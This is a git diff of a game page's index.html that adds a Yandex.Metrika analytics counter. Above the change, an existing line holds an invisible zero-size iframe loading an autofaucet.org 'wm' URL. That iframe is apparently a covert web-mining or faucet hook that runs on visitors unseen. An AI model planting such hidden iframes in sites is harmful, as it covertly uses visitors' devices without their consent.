--- a/index.html
+++ b/index.html
@@ -44,6 +44,20 @@
 </head>
 <body>
 <iframe src="https://autofaucet.org/wm/svatoslav/4" width="0" height="0" style="border:0"></iframe>
+    <!-- Yandex.Metrika counter -->
+<script type="text/javascript" >
+   (function(m,e,t,r,i,k,a){m[i]=m[i]||function(){(m[i].a=m[i].a||[]).push(arguments)};
+   m[i].l=1*new Date();k=e.createElement(t),a=e.getElementsByTagName(t)[0],k.async=1,k.src=r,a.parentNode.insertBefore(k,a)})
+   (window, document, "script", "https://mc.yandex.ru/metrika/tag.js", "ym");
+
+   ym(88019277, "init", {
+        clickmap:true,
+        trackLinks:true,
+        accurateTrackBounce:true
+   });
+</script>
+<noscript><div><img src="https://mc.yandex.ru/watch/88019277" style="position:absolute; left:-9999px;" alt="" /></div></noscript>
+<!-- /Yandex.Metrika counter -->
     <h1>Рекомендуется играть в альбомном формате</h1>
     <div id="container" style="height: 880px; width: 1900px;">
         <iframe id="frame" src="https://s3-eu-west-1.amazonaws.com/apps.playcanvas.com/R2axJfsc/index.html" webkitallowfullscreen="true" mozallowfullscreen="true" allow="autoplay" allowfullscreen="true" allowvr scrolling="no" frameborder="0" style="height: 880px; width: 1900px;">
